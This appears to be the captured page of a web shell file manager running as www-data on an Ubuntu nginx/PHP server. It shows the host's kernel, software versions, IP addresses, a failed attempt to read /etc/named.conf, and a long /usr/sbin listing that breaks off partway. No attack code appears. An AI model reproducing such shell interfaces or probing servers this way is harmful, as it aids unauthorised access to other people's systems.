Linux ubuntu 6.8.0-90-generic #91-Ubuntu SMP PREEMPT_DYNAMIC Tue Nov 18 14:14:30 UTC 2025 x86_64
nginx/1.24.0
: 67.217.245.49 | : 216.73.216.153
Cant Read [ /etc/named.conf ]
8.3.6
www-data
/
usr /
sbin /
[ HOME SHELL ]
Name
Size
Permission
Action
ModemManager
2.07
MB
-rwxr-xr-x
a2disconf
15.75
KB
-rwxr-xr-x
a2dismod
15.75
KB
-rwxr-xr-x
a2dissite
15.75
KB
-rwxr-xr-x
a2enconf
15.75
KB
-rwxr-xr-x
a2enmod
15.75
KB
-rwxr-xr-x
a2ensite
15.75
KB
-rwxr-xr-x
a2query
9.6
KB
-rwxr-xr-x
aa-load
38.75
KB
-rwxr-xr-x
aa-remove-unknown
3.15
KB
-rwxr-xr-x
aa-status
39.06
KB
-rwxr-xr-x
aa-teardown
137
B
-rwxr-xr-x
accessdb
14.55
KB
-rwxr-xr-x
add-shell
1.03
KB
-rwxr-xr-x
addgnupghome
3
KB
-rwxr-xr-x
addgroup
53.9
KB
-rwxr-xr-x
adduser
53.9
KB
-rwxr-xr-x
agetty
59.56
KB
-rwxr-xr-x
apache2
736.55
KB
-rwxr-xr-x
apache2ctl
7.26
KB
-rwxr-xr-x
apachectl
7.26
KB
-rwxr-xr-x
apparmor_parser
1.55
MB
-rwxr-xr-x
apparmor_status
39.06
KB
-rwxr-xr-x
applygnupgdefaults
2.17
KB
-rwxr-xr-x
argdist-bpfcc
36
KB
-rwxr-xr-x
arp
61.61
KB
-rwxr-xr-x
arpd
26.33
KB
-rwxr-xr-x
arptables
219.16
KB
-rwxr-xr-x
arptables-nft
219.16
KB
-rwxr-xr-x
arptables-nft-restore
219.16
KB
-rwxr-xr-x
arptables-nft-save
219.16
KB
-rwxr-xr-x
arptables-restore
219.16
KB
-rwxr-xr-x
arptables-save
219.16
KB
-rwxr-xr-x
audisp-af_unix
14.31
KB
-rwxr-xr-x
audisp-remote
50.41
KB
-rwxr-xr-x
audisp-syslog
18.3
KB
-rwxr-xr-x
audispd-zos-remote
34.38
KB
-rwxr-xr-x
auditctl
50.5
KB
-rwxr-xr-x
auditd
118.41
KB
-rwxr-xr-x
augenrules
3.74
KB
-rwxr-xr-x
aureport
110.41
KB
-rwxr-xr-x
ausearch
110.45
KB
-rwxr-xr-x
autrace
18.3
KB
-rwxr-xr-x
badblocks
34.32
KB
-rwxr-xr-x
bashreadline-bpfcc
2.32
KB
-rwxr-xr-x
bashreadline.bt
698
B
-rwxr-xr-x
bcache-super-show
14.3
KB
-rwxr-xr-x
bindsnoop-bpfcc
15.96
KB
-rwxr-xr-x
biolatency-bpfcc
11.1
KB
-rwxr-xr-x
biolatency-kp.bt
664
B
-rwxr-xr-x
biolatency.bt
681
B
-rwxr-xr-x
biolatpcts-bpfcc
10.01
KB
-rwxr-xr-x
biopattern-bpfcc
3.86
KB
-rwxr-xr-x
biosdecode
27.2
KB
-rwxr-xr-x
biosnoop-bpfcc
10.58
KB
-rwxr-xr-x
biosnoop.bt
1.12
KB
-rwxr-xr-x
biostacks.bt
915
B
-rwxr-xr-x
biotop-bpfcc
9.34
KB
-rwxr-xr-x
bitesize-bpfcc
1.14
KB
-rwxr-xr-x
bitesize.bt
567
B
-rwxr-xr-x
blkdeactivate
15.97
KB
-rwxr-xr-x
blkdiscard
22.38
KB
-rwxr-xr-x
blkid
54.41
KB
-rwxr-xr-x
blkzone
34.38
KB
-rwxr-xr-x
blockdev
34.38
KB
-rwxr-xr-x
bpflist-bpfcc
2.54
KB
-rwxr-xr-x
bpftool
1.58
KB
-rwxr-xr-x
bridge
108.49
KB
-rwxr-xr-x
btrfsdist-bpfcc
6.47
KB
-rwxr-xr-x
btrfsslower-bpfcc
9.75
KB
-rwxr-xr-x
cache_check
1.36
MB
-rwxr-xr-x
cache_dump
1.36
MB
-rwxr-xr-x
cache_metadata_size
1.36
MB
-rwxr-xr-x
cache_repair
1.36
MB
-rwxr-xr-x
cache_restore
1.36
MB
-rwxr-xr-x
cache_writeback
1.36
MB
-rwxr-xr-x
cachestat-bpfcc
6.38
KB
-rwxr-xr-x
cachetop-bpfcc
9.15
KB
-rwxr-xr-x
capable-bpfcc
8.28
KB
-rwxr-xr-x
capable.bt
1.88
KB
-rwxr-xr-x
capsh
57.09
KB
-rwxr-xr-x
cfdisk
94.73
KB
-rwxr-xr-x
cgdisk
166.48
KB
-rwxr-xr-x
chcpu
30.38
KB
-rwxr-xr-x
check_forensic
952
B
-rwxr-xr-x
chgpasswd
58.32
KB
-rwxr-xr-x
chmem
34.38
KB
-rwxr-xr-x
chpasswd
54.43
KB
-rwxr-xr-x
chroot
38.51
KB
-rwxr-xr-x
cobjnew-bpfcc
53
B
-rwxr-xr-x
compactsnoop-bpfcc
11.1
KB
-rwxr-xr-x
cpgr
48.45
KB
-rwxr-xr-x
cppw
48.45
KB
-rwxr-xr-x
cpudist-bpfcc
6.85
KB
-rwxr-xr-x
cpuunclaimed-bpfcc
14.59
KB
-rwxr-xr-x
cpuwalk.bt
497
B
-rwxr-xr-x
criticalstat-bpfcc
8.41
KB
-rwxr-xr-x
cron
58.67
KB
-rwxr-xr-x
cryptdisks_start
1.51
KB
-rwxr-xr-x
cryptdisks_stop
844
B
-rwxr-xr-x
cryptsetup
225.9
KB
-rwxr-xr-x
ctrlaltdel
14.38
KB
-rwxr-xr-x
dbslower-bpfcc
7.22
KB
-rwxr-xr-x
dbstat-bpfcc
3.7
KB
-rwxr-xr-x
dcb
80.52
KB
-rwxr-xr-x
dcsnoop-bpfcc
4.03
KB
-rwxr-xr-x
dcsnoop.bt
1.23
KB
-rwxr-xr-x
dcstat-bpfcc
3.77
KB
-rwxr-xr-x
deadlock-bpfcc
20.45
KB
-rwxr-xr-x
debugfs
225.87
KB
-rwxr-xr-x
delgroup
18.53
KB
-rwxr-xr-x
deluser
18.53
KB
-rwxr-xr-x
depmod
170.24
KB
-rwxr-xr-x
devlink
150.86
KB
-rwxr-xr-x
dhcpcd
395.4
KB
-rwxr-xr-x
dirtop-bpfcc
8.37
KB
-rwxr-xr-x
dmeventd
50.38
KB
-rwxr-xr-x
dmidecode
135.25
KB
-rwxr-xr-x
dmsetup
171.05
KB
-rwxr-xr-x
dmstats
171.05
KB
-rwxr-xr-x
dosfsck
78.38
KB
-rwxr-xr-x
dosfslabel
38.38
KB
-rwxr-xr-x
dpkg-preconfigure
4.25
KB
-rwxr-xr-x
dpkg-reconfigure
4.43
KB
-rwxr-xr-x
drsnoop-bpfcc
6.73
KB
-rwxr-xr-x
dumpe2fs
34.31
KB
-rwxr-xr-x
e2freefrag
18.3
KB
-rwxr-xr-x
e2fsck
364.34
KB
-rwxr-xr-x
e2image
42.31
KB
-rwxr-xr-x
e2label
110.56
KB
-rwxr-xr-x
e2mmpstatus
34.31
KB
-rwxr-xr-x
e2scrub
7.12
KB
-rwxr-xr-x
e2scrub_all
5.27
KB
-rwxr-xr-x
e2undo
22.3
KB
-rwxr-xr-x
e4crypt
30.38
KB
-rwxr-xr-x
e4defrag
34.3
KB
-rwxr-xr-x
ebtables
219.16
KB
-rwxr-xr-x
ebtables-nft
219.16
KB
-rwxr-xr-x
ebtables-nft-restore
219.16
KB
-rwxr-xr-x
ebtables-nft-save
219.16
KB
-rwxr-xr-x
ebtables-restore
219.16
KB
-rwxr-xr-x
ebtables-save
219.16
KB
-rwxr-xr-x
ebtables-translate
219.16
KB
-rwxr-xr-x
era_check
1.36
MB
-rwxr-xr-x
era_dump
1.36
MB
-rwxr-xr-x
era_invalidate
1.36
MB
-rwxr-xr-x
era_restore
1.36
MB
-rwxr-xr-x
ethtool
651.68
KB
-rwxr-xr-x
execsnoop-bpfcc
9.82
KB
-rwxr-xr-x
execsnoop.bt
928
B
-rwxr-xr-x
exitsnoop-bpfcc
9.42
KB
-rwxr-xr-x
ext4dist-bpfcc
6.53
KB
-rwxr-xr-x
ext4slower-bpfcc
9.71
KB
-rwxr-xr-x
faillock
22.31
KB
-rwxr-xr-x
fatlabel
38.38
KB
-rwxr-xr-x
fdisk
114.42
KB
-rwxr-xr-x
filefrag
18.32
KB
-rwxr-xr-x
filegone-bpfcc
5.64
KB
-rwxr-xr-x
filelife-bpfcc
6.38
KB
-rwxr-xr-x
fileslower-bpfcc
7.2
KB
-rwxr-xr-x
filetop-bpfcc
6.35
KB
-rwxr-xr-x
findfs
14.38
KB
-rwxr-xr-x
fixparts
58.48
KB
-rwxr-xr-x
fsadm
24
KB
-rwxr-xr-x
fsck
42.42
KB
-rwxr-xr-x
fsck.btrfs
1.16
KB
-rwxr-xr-x
fsck.cramfs
30.44
KB
-rwxr-xr-x
fsck.ext2
364.34
KB
-rwxr-xr-x
fsck.ext3
364.34
KB
-rwxr-xr-x
fsck.ext4
364.34
KB
-rwxr-xr-x
fsck.fat
78.38
KB
-rwxr-xr-x
fsck.minix
54.41
KB
-rwxr-xr-x
fsck.msdos
78.38
KB
-rwxr-xr-x
fsck.vfat
78.38
KB
-rwxr-xr-x
fsck.xfs
2.51
KB
-rwxr-xr-x
fsfreeze
14.38
KB
-rwxr-xr-x
fstab-decode
14.3
KB
-rwxr-xr-x
fstrim
42.38
KB
-rwxr-xr-x
funccount-bpfcc
12.68
KB
-rwxr-xr-x
funcinterval-bpfcc
5.46
KB
-rwxr-xr-x
funclatency-bpfcc
11.28
KB
-rwxr-xr-x
funcslower-bpfcc
10.38
KB
-rwxr-xr-x
gdisk
198.48
KB
-rwxr-xr-x
genl
120.58
KB
-rwxr-xr-x
getcap
14.3
KB
-rwxr-xr-x
gethostlatency-bpfcc
3.82
KB
-rwxr-xr-x
gethostlatency.bt
1.19
KB
-rwxr-xr-x
getpcaps
14.3
KB
-rwxr-xr-x
getty
59.56
KB
-rwxr-xr-x
groupadd
71.13
KB
-rwxr-xr-x
groupdel
62.91
KB
-rwxr-xr-x
groupmems
58.34
KB
-rwxr-xr-x
groupmod
71.04
KB
-rwxr-xr-x
grpck
58.32
KB
-rwxr-xr-x
grpconv
50.16
KB
-rwxr-xr-x
grpunconv
50.16
KB
-rwxr-xr-x
grub-bios-setup
958.55
KB
-rwxr-xr-x
grub-install
1.17
MB
-rwxr-xr-x
grub-macbless
946.41
KB
-rwxr-xr-x
grub-mkconfig
8.63
KB
-rwxr-xr-x
grub-mkdevicemap
70.69
KB
-rwxr-xr-x
grub-probe
954.66
KB
-rwxr-xr-x
grub-reboot
4.73
KB
-rwxr-xr-x
grub-set-default
3.47
KB
-rwxr-xr-x
halt
1.43
MB
-rwxr-xr-x
hardirqs-bpfcc
6.85
KB
-rwxr-xr-x
hdparm
139.43
KB
-rwxr-xr-x
httxt2dbm
14.3
KB
-rwxr-xr-x
iconvconfig
34.47
KB
-rwxr-xr-x
ifconfig
77.17
KB
-rwxr-xr-x
iftop
62.62
KB
-rwxr-xr-x
init
98.45
KB
-rwxr-xr-x
inject-bpfcc
16.06
KB
-rwxr-xr-x
insmod
170.24
KB
-rwxr-xr-x
install-sgmlcatalog
4.44
KB
-rwxr-xr-x
installkernel
2.6
KB
-rwxr-xr-x
integritysetup
67.06
KB
-rwxr-xr-x
invoke-rc.d
16.13
KB
-rwxr-xr-x
iotop
113.64
KB
-rwxr-xr-x
iotop-c
113.64
KB
-rwxr-xr-x
ip
754.8
KB
-rwxr-xr-x
ip6tables
219.16
KB
-rwxr-xr-x
ip6tables-apply
6.89
KB
-rwxr-xr-x
ip6tables-legacy
92.95
KB
-rwxr-xr-x
ip6tables-legacy-restore
92.95
KB
-rwxr-xr-x
ip6tables-legacy-save
92.95
KB
-rwxr-xr-x
ip6tables-nft
219.16
KB
-rwxr-xr-x
ip6tables-nft-restore
219.16
KB
-rwxr-xr-x
ip6tables-nft-save
219.16
KB
-rwxr-xr-x
ip6tables-restore
219.16
KB
-rwxr-xr-x
ip6tables-restore-translate
219.16
KB
-rwxr-xr-x
ip6tables-save
219.16
KB
-rwxr-xr-x
ip6tables-translate
219.16
KB
-rwxr-xr-x
ipmaddr
18.3
KB
-rwxr-xr-x
iptables
219.16
KB
-rwxr-xr-x
iptables-apply
6.89
KB
-rwxr-xr-x
iptables-legacy
92.95
KB
-rwxr-xr-x
iptables-legacy-restore
92.95
KB
-rwxr-xr-x
iptables-legacy-save
92.95
KB
-rwxr-xr-x
iptables-nft
219.16
KB
-rwxr-xr-x
iptables-nft-restore
219.16
KB
-rwxr-xr-x
iptables-nft-save
219.16
KB
-rwxr-xr-x
iptables-restore
219.16
KB
-rwxr-xr-x
iptables-restore-translate
219.16
KB
-rwxr-xr-x
iptables-save
219.16
KB
-rwxr-xr-x
iptables-translate
219.16
KB
-rwxr-xr-x
iptunnel
18.3
KB
-rwxr-xr-x
iscsi-iname
18.3
KB
-rwxr-xr-x
iscsi_discovery
5.17
KB
-rwxr-xr-x
iscsiadm
370.43
KB
-rwxr-xr-x
iscsid
286.55
KB
-rwxr-xr-x
iscsistart
274.49
KB
-rwxr-xr-x
isosize
14.38
KB
-rwxr-xr-x
javacalls-bpfcc
55
B
-rwxr-xr-x
javaflow-bpfcc
54
B
-rwxr-xr-x
javagc-bpfcc
52
B
-rwxr-xr-x
javaobjnew-bpfcc
56
B
-rwxr-xr-x
javastat-bpfcc
54
B
-rwxr-xr-x
javathreads-bpfcc
57
B
-rwxr-xr-x
kbdrate
18.31
KB
-rwxr-xr-x
killall5
26.23
KB
-rwxr-xr-x
killsnoop-bpfcc
4.45
KB
-rwxr-xr-x
killsnoop.bt
873
B
-rwxr-xr-x
klockstat-bpfcc
13.04
KB
-rwxr-xr-x
kpartx
42.16
KB
-rwxr-xr-x
kvmexit-bpfcc
11.19
KB
-rwxr-xr-x
ldattach
26.38
KB
-rwxr-xr-x
ldconfig
387
B
-rwxr-xr-x
ldconfig.real
1
MB
-rwxr-xr-x
llcstat-bpfcc
4.48
KB
-rwxr-xr-x
loads.bt
1.1
KB
-rwxr-xr-x
locale-gen
4.21
KB
-rwxr-xr-x
logrotate
94.24
KB
-rwxr-xr-x
logsave
14.16
KB
-rwxr-xr-x
losetup
74.52
KB
-rwxr-xr-x
lsmod
170.24
KB
-rwxr-xr-x
luksformat
3.32
KB
-rwxr-xr-x
lvchange
3.01
MB
-rwxr-xr-x
lvconvert
3.01
MB
-rwxr-xr-x
lvcreate
3.01
MB
-rwxr-xr-x
lvdisplay
3.01
MB
-rwxr-xr-x
lvextend
3.01
MB
-rwxr-xr-x
lvm
3.01
MB
-rwxr-xr-x
lvmconfig
3.01
MB
-rwxr-xr-x
lvmdiskscan
3.01
MB
-rwxr-xr-x
lvmdump
10.12
KB
-rwxr-xr-x
lvmpolld
235.97
KB
-rwxr-xr-x
lvmsadc
3.01
MB
-rwxr-xr-x
lvmsar
3.01
MB
-rwxr-xr-x
lvreduce
3.01
MB
-rwxr-xr-x
lvremove
3.01
MB
-rwxr-xr-x
lvrename
3.01
MB
-rwxr-xr-x
lvresize
3.01
MB
-rwxr-xr-x
lvs
3.01
MB
-rwxr-xr-x
lvscan
3.01
MB
-rwxr-xr-x
lxc
589
B
-rwxr-xr-x
lxd
589
B
-rwxr-xr-x
make-bcache
22.38
KB
-rwxr-xr-x
make-ssl-cert
6.65
KB
-rwxr-xr-x
mariadbd
26.09
MB
-rwxr-xr-x
mdadm
622.21
KB
-rwxr-xr-x
mdflush-bpfcc
2.24
KB
-rwxr-xr-x
mdflush.bt
775
B
-rwxr-xr-x
mdmon
258.8
KB
-rwxr-xr-x
memleak-bpfcc
20.8
KB
-rwxr-xr-x
mii-tool
26.73
KB
-rwxr-xr-x
mkdosfs
50.83
KB
-rwxr-xr-x
mke2fs
130.62
KB
-rwxr-xr-x
mkfs
14.38
KB
-rwxr-xr-x
mkfs.bfs
22.38
KB
-rwxr-xr-x
mkfs.btrfs
560.3
KB
-rwxr-xr-x
mkfs.cramfs
34.32
KB
-rwxr-xr-x
mkfs.ext2
130.62
KB
-rwxr-xr-x
mkfs.ext3
130.62
KB
-rwxr-xr-x
mkfs.ext4
130.62
KB
-rwxr-xr-x
mkfs.fat
50.83
KB
-rwxr-xr-x
mkfs.minix
42.39
KB
-rwxr-xr-x
mkfs.msdos
50.83
KB
-rwxr-xr-x
mkfs.ntfs
66.38
KB
-rwxr-xr-x
mkfs.vfat
50.83
KB
-rwxr-xr-x
mkfs.xfs
438.99
KB
-rwxr-xr-x
mkhomedir_helper
22.34
KB
-rwxr-xr-x
mkinitramfs
15.39
KB
-rwxr-xr-x
mklost+found
14.3
KB
-rwxr-xr-x
mkntfs
66.38
KB
-rwxr-xr-x
mkswap
50.38
KB
-rwxr-xr-x
modinfo
170.24
KB
-rwxr-xr-x
modprobe
170.24
KB
-rwxr-xr-x
mount.fuse
18.3
KB
-rwxr-xr-x
mount.fuse3
18.3
KB
-rwxr-xr-x
mount.lowntfs-3g
118.98
KB
-rwxr-xr-x
mount.ntfs
159.01
KB
-rwxr-xr-x
mount.ntfs-3g
159.01
KB
-rwxr-xr-x
mountsnoop-bpfcc
14.62
KB
-rwxr-xr-x
mpathpersist
31.21
KB
-rwxr-xr-x
multipath
34.3
KB
-rwxr-xr-x
multipathc
18.3
KB
-rwxr-xr-x
multipathd
142.46
KB
-rwxr-xr-x
mysqld
26.09
MB
-rwxr-xr-x
mysqld_qslower-bpfcc
3.05
KB
-rwxr-xr-x
nameif
14.39
KB
-rwxr-xr-x
naptime.bt
1.01
KB
-rwxr-xr-x
needrestart
40.13
KB
-rwxr-xr-x
netplan
802
B
-rwxr-xr-x
netqtop-bpfcc
5.59
KB
-rwxr-xr-x
newusers
86.96
KB
-rwxr-xr-x
nfnl_osf
18.3
KB
-rwxr-xr-x
nfsdist-bpfcc
4.95
KB
-rwxr-xr-x
nfsslower-bpfcc
13.61
KB
-rwxr-xr-x
nft
26.23
KB
-rwxr-xr-x
nginx
1.25
MB
-rwxr-xr-x
nodegc-bpfcc
52
B
-rwxr-xr-x
nodestat-bpfcc
54
B
-rwxr-xr-x
nologin
14.3
KB
-rwxr-xr-x
ntfsclone
50.38
KB
-rwxr-xr-x
ntfscp
30.38
KB
-rwxr-xr-x
ntfslabel
22.38
KB
-rwxr-xr-x
ntfsresize
62.39
KB
-rwxr-xr-x
ntfsundelete
50.38
KB
-rwxr-xr-x
offcputime-bpfcc
13.46
KB
-rwxr-xr-x
offwaketime-bpfcc
15.31
KB
-rwxr-xr-x
on_ac_power
3.7
KB
-rwxr-xr-x
oomkill-bpfcc
2.04
KB
-rwxr-xr-x
oomkill.bt
1.17
KB
-rwxr-xr-x
opensnoop-bpfcc
14.24
KB
-rwxr-xr-x
opensnoop.bt
953
B
-rwxr-xr-x
overlayroot-chroot
2.45
KB
-rwxr-xr-x
ownership
14.45
KB
-rwxr-xr-x
pam-auth-update
20.96
KB
-rwxr-xr-x
pam_extrausers_chkpwd
26.31
KB
-rwxr-sr-x
pam_extrausers_update
34.31
KB
-rwxr-xr-x
pam_getenv
2.82
KB
-rwxr-xr-x
pam_namespace_helper
467
B
-rwxr-xr-x
pam_timestamp_check
14.31
KB
-rwxr-xr-x
parted
94.4
KB
-rwxr-xr-x
partprobe
14.38
KB
-rwxr-xr-x
pdata_tools
1.36
MB
-rwxr-xr-x
perlcalls-bpfcc
55
B
-rwxr-xr-x
perlflow-bpfcc
54
B
-rwxr-xr-x
perlstat-bpfcc
54
B
-rwxr-xr-x
php-fpm8.3
5.49
MB
-rwxr-xr-x
phpcalls-bpfcc
54
B
-rwxr-xr-x
phpdismod
7.11
KB
-rwxr-xr-x
phpenmod
7.11
KB
-rwxr-xr-x
phpflow-bpfcc
53
B
-rwxr-xr-x
phpquery
6.24
KB
-rwxr-xr-x
phpstat-bpfcc
53
B
-rwxr-xr-x
pidpersec-bpfcc
1.08
KB
-rwxr-xr-x
pidpersec.bt
628
B
-rwxr-xr-x
pivot_root
14.38
KB
-rwxr-xr-x
plipconfig
14.3
KB
-rwxr-xr-x
plymouthd
146.57
KB
-rwxr-xr-x
poweroff
1.43
MB
-rwxr-xr-x
ppchcalls-bpfcc
13.89
KB
-rwxr-xr-x
profile-bpfcc
14.41
KB
-rwxr-xr-x
pvchange
3.01
MB
-rwxr-xr-x
pvck
3.01
MB
-rwxr-xr-x
pvcreate
3.01
MB
-rwxr-xr-x
pvdisplay
3.01
MB
-rwxr-xr-x
pvmove
3.01
MB
-rwxr-xr-x
pvremove
3.01
MB
-rwxr-xr-x
pvresize
3.01
MB
-rwxr-xr-x
pvs
3.01
MB
-rwxr-xr-x
pvscan
3.01
MB
-rwxr-xr-x
pwck
54.29
KB
-rwxr-xr-x
pwconv
46.16
KB
-rwxr-xr-x
pwhistory_helper
22.31
KB
-rwxr-xr-x
pwunconv
46.16
KB
-rwxr-xr-x
pythoncalls-bpfcc
57
B
-rwxr-xr-x
pythonflow-bpfcc
56
B
-rwxr-xr-x
pythongc-bpfcc
54
B
-rwxr-xr-x
pythonstat-bpfcc
56
B
-rwxr-xr-x
rarp
32.33
KB
-rwxr-xr-x
rdmaucma-bpfcc
4.95
KB
-rwxr-xr-x
readahead-bpfcc
6.54
KB
-rwxr-xr-x
readprofile
22.41
KB
-rwxr-xr-x
reboot
1.43
MB
-rwxr-xr-x
remove-shell
1.08
KB
-rwxr-xr-x
reset-trace-bpfcc
3.42
KB
-rwxr-xr-x
resize2fs
70.3
KB
-rwxr-xr-x
resolvconf
158.67
KB
-rwxr-xr-x
rmmod
170.24
KB
-rwxr-xr-x
rmt
54.71
KB
-rwxr-xr-x
rmt-tar
54.71
KB
-rwxr-xr-x
route
68.27
KB
-rwxr-xr-x
rsyslogd
771.67
KB
-rwxr-xr-x
rtacct
28.31
KB
-rwxr-xr-x
rtcwake
34.38
KB
-rwxr-xr-x
rtmon
116.52
KB
-rwxr-xr-x
rubycalls-bpfcc
55
B
-rwxr-xr-x
rubyflow-bpfcc
54
B
-rwxr-xr-x
rubygc-bpfcc
52
B
-rwxr-xr-x
rubyobjnew-bpfcc
56
B
-rwxr-xr-x
rubystat-bpfcc
54
B
-rwxr-xr-x
runlevel
1.43
MB
-rwxr-xr-x
runqlat-bpfcc
9.3
KB
-rwxr-xr-x
runqlat.bt
788
B
-rwxr-xr-x
runqlen-bpfcc
8.05
KB
-rwxr-xr-x
runqlen.bt
1.01
KB
-rwxr-xr-x
runqslower-bpfcc
9.01
KB
-rwxr-xr-x
runuser
54.38
KB
-rwxr-xr-x
service
8.89
KB
-rwxr-xr-x
setcap
14.3
KB
-rwxr-xr-x
setuids.bt
1.76
KB
-rwxr-xr-x
setvesablank
14.37
KB
-rwxr-xr-x
setvtrgb
14.43
KB
-rwxr-xr-x
sfdisk
106.38
KB
-rwxr-xr-x
sgdisk
178.48
KB
-rwxr-xr-x
shadowconfig
2.22
KB
-rwxr-xr-x
shmsnoop-bpfcc
7.8
KB
-rwxr-xr-x
shutdown
1.43
MB
-rwxr-xr-x
slabratetop-bpfcc
6.38
KB
-rwxr-xr-x
slattach
36.08
KB
-rwxr-xr-x
sofdsnoop-bpfcc
8.06
KB
-rwxr-xr-x
softirqs-bpfcc
5.59
KB
-rwxr-xr-x
solisten-bpfcc
5.96
KB
-rwxr-xr-x
split-logfile
2.36
KB
-rwxr-xr-x
sshd
899.82
KB
-rwxr-xr-x
ssllatency.bt
2.08
KB
-rwxr-xr-x
sslsniff-bpfcc
13.68
KB
-rwxr-xr-x
sslsnoop.bt
1.99
KB
-rwxr-xr-x
stackcount-bpfcc
16.26
KB
-rwxr-xr-x
start-stop-daemon
47.49
KB
-rwxr-xr-x
statsnoop-bpfcc
4.92
KB
-rwxr-xr-x
statsnoop.bt
1.26
KB
-rwxr-xr-x
sudo_logsrvd
248.5
KB
-rwxr-xr-x
sudo_sendlog
131.67
KB
-rwxr-xr-x
sulogin
42.38
KB
-rwxr-xr-x
swapin.bt
600
B
-rwxr-xr-x
swaplabel
18.38
KB
-rwxr-xr-x
swapoff
22.38
KB
-rwxr-xr-x
swapon
42.38
KB
-rwxr-xr-x
switch_root
22.38
KB
-rwxr-xr-x
syncsnoop-bpfcc
1.27
KB
-rwxr-xr-x
syncsnoop.bt
839
B
-rwxr-xr-x
syscount-bpfcc
8.57
KB
-rwxr-xr-x
syscount.bt
872
B
-rwxr-xr-x
sysctl
30.38
KB
-rwxr-xr-x
tarcat
936
B
-rwxr-xr-x
tc
630.08
KB
-rwxr-xr-x
tclcalls-bpfcc
54
B
-rwxr-xr-x
tclflow-bpfcc
53
B
-rwxr-xr-x
tclobjnew-bpfcc
55
B
-rwxr-xr-x
tclstat-bpfcc
53
B
-rwxr-xr-x
tcpaccept-bpfcc
9
KB
-rwxr-xr-x
tcpaccept.bt
1.71
KB
-rwxr-xr-x
tcpcong-bpfcc
20.11
KB
-rwxr-xr-x
tcpconnect-bpfcc
18.46
KB
-rwxr-xr-x
tcpconnect.bt
1.58
KB
-rwxr-xr-x
tcpconnlat-bpfcc
9.07
KB
-rwxr-xr-x
tcpdrop-bpfcc
7.44
KB
-rwxr-xr-x
tcpdrop.bt
2.41
KB
-rwxr-xr-x
tcplife-bpfcc
16.55
KB
-rwxr-xr-x
tcplife.bt
2.72
KB
-rwxr-xr-x
tcpretrans-bpfcc
13.77
KB
-rwxr-xr-x
tcpretrans.bt
2.07
KB
-rwxr-xr-x
tcprtt-bpfcc
8.7
KB
-rwxr-xr-x
tcpstates-bpfcc
13.73
KB
-rwxr-xr-x
tcpsubnet-bpfcc
7.63
KB
-rwxr-xr-x
tcpsynbl-bpfcc
2.12
KB
-rwxr-xr-x
tcpsynbl.bt
962
B
-rwxr-xr-x
tcptop-bpfcc
12.64
KB
-rwxr-xr-x
tcptracer-bpfcc
17.71
KB
-rwxr-xr-x
telinit
1.43
MB
-rwxr-xr-x
thin_check
1.36
MB
-rwxr-xr-x
thin_delta
1.36
MB
-rwxr-xr-x
thin_dump
1.36
MB
-rwxr-xr-x
thin_ls
1.36
MB
-rwxr-xr-x
thin_metadata_size
1.36
MB
-rwxr-xr-x
thin_repair
1.36
MB
-rwxr-xr-x
thin_restore
1.36
MB
-rwxr-xr-x
thin_rmap
1.36
MB
-rwxr-xr-x
thin_trim
1.36
MB
-rwxr-xr-x
threadsnoop-bpfcc
1.81
KB
-rwxr-xr-x
threadsnoop.bt
712
B
-rwxr-xr-x
tipc
90.52
KB
-rwxr-xr-x
tplist-bpfcc
4.06
KB
-rwxr-xr-x
trace-bpfcc
42.86
KB
-rwxr-xr-x
ttysnoop-bpfcc
7.51
KB
-rwxr-xr-x
tune2fs
110.56
KB
-rwxr-xr-x
ucalls
11.69
KB
-rwxr-xr-x
uflow
7.92
KB
-rwxr-xr-x
ufw
4.84
KB
-rwxr-xr-x
ugc
7.64
KB
-rwxr-xr-x
umount.udisks2
14.3
KB
-rwxr-xr-x
undump.bt
789
B
-rwxr-xr-x
unix_chkpwd
30.31
KB
-rwxr-sr-x
unix_update
34.31
KB
-rwxr-xr-x
uobjnew
6.04
KB
-rwxr-xr-x
update-ca-certificates
5.32
KB
-rwxr-xr-x
update-catalog
9.17
KB
-rwxr-xr-x
update-grub
64
B
-rwxr-xr-x
update-grub-gfxpayload
301
B
-rwxr-xr-x
update-grub2
64
B
-rwxr-xr-x
update-ieee-data
3.41
KB
-rwxr-xr-x
update-info-dir
1.66
KB
-rwxr-xr-x
update-initramfs
6.75
KB
-rwxr-xr-x
update-locale
2.99
KB
-rwxr-xr-x
update-passwd
34.56
KB
-rwxr-xr-x
update-pciids
1.74
KB
-rwxr-xr-x
update-rc.d
17.72
KB
-rwxr-xr-x
update-secureboot-policy
7.43
KB
-rwxr-xr-x
update-shells
3.89
KB
-rwxr-xr-x
update-xmlcatalog
16.88
KB
-rwxr-xr-x
upgrade-from-grub-legacy
1.56
KB
-rwxr-xr-x
usb_modeswitch
59.66
KB
-rwxr-xr-x
usb_modeswitch_dispatcher
26.78
KB
-rwxr-xr-x
useradd
139.88
KB
-rwxr-xr-x
userdel
91.01
KB
-rwxr-xr-x
usermod
127.65
KB
-rwxr-xr-x
ustat
12.12
KB
-rwxr-xr-x
uthreads
4
KB
-rwxr-xr-x
uuidd
30.88
KB
-rwxr-xr-x
validlocale
1.73
KB
-rwxr-xr-x
vcstime
14.3
KB
-rwxr-xr-x
vdpa
34.56
KB
-rwxr-xr-x
veritysetup
43.94
KB
-rwxr-xr-x
vfscount-bpfcc
1.36
KB
-rwxr-xr-x
vfscount.bt
515
B
-rwxr-xr-x
vfsstat-bpfcc
4.06
KB
-rwxr-xr-x
vfsstat.bt
721
B
-rwxr-xr-x
vgcfgbackup
3.01
MB
-rwxr-xr-x
vgcfgrestore
3.01
MB
-rwxr-xr-x
vgchange
3.01
MB
-rwxr-xr-x
vgck
3.01
MB
-rwxr-xr-x
vgconvert
3.01
MB
-rwxr-xr-x
vgcreate
3.01
MB
-rwxr-xr-x
vgdisplay
3.01
MB
-rwxr-xr-x
vgexport
3.01
MB
-rwxr-xr-x
vgextend
3.01
MB
-rwxr-xr-x
vgimport
3.01
MB
-rwxr-xr-x
vgimportclone
3.01
MB
-rwxr-xr-x
vgmerge
3.01
MB
-rwxr-xr-x
vgmknodes
3.01
MB
-rwxr-xr-x
vgreduce
3.01
MB
-rwxr-xr-x
vgremove
3.01
MB
-rwxr-xr-x
vgrename
3.01
MB
-rwxr-xr-x
vgs
3.01
MB
-rwxr-xr-x
vgscan
3.01
MB
-rwxr-xr-x
vgsplit
3.01
MB
-rwxr-xr-x
vigr
60.69
KB
-rwxr-xr-x
vipw
60.69
KB
-rwxr-xr-x
virtiostat-bpfcc
8.69
KB
-rwxr-xr-x
visudo
252.71
KB
-rwxr-xr-x
vnstatd
93.28
KB
-rwxr-xr-x
vpddecode
14.58
KB
-rwxr-xr-x
vsftpd
156.48
KB
-rwxr-xr-x
wakeuptime-bpfcc
